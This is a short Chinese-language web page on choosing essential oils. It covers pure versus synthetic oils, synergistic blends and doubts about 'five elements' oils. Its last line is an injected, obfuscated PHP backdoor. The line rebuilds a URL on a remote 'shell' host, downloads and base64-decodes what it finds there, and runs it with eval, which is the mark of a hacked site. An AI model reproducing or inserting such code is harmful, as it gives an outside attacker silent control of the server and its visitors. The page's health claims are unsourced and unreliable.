收藏本站
認識好精油 列印 E-mail
①為了確保精油的功效,一定要選用純精油。不論精油聞起來多香,人工合成精油或以化學物質仿製而成的精油,或者是只為了增加份量而添加酒精的精油,不但對人體不具任何療效,反而有害。

②當兩種以上精油調和的效果優於單方的效果時,我們稱之為「協同作用」。因此取兩種或更多純精油所調和而成的「複方精油」,將比各自使用單方精油帶來更大的效益。

③坊間許多自稱「五行精油」者,經本人測試,多為商業包裝與行銷,所述功效與臨床測試實際落差甚大,本人無法為之背書。
 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));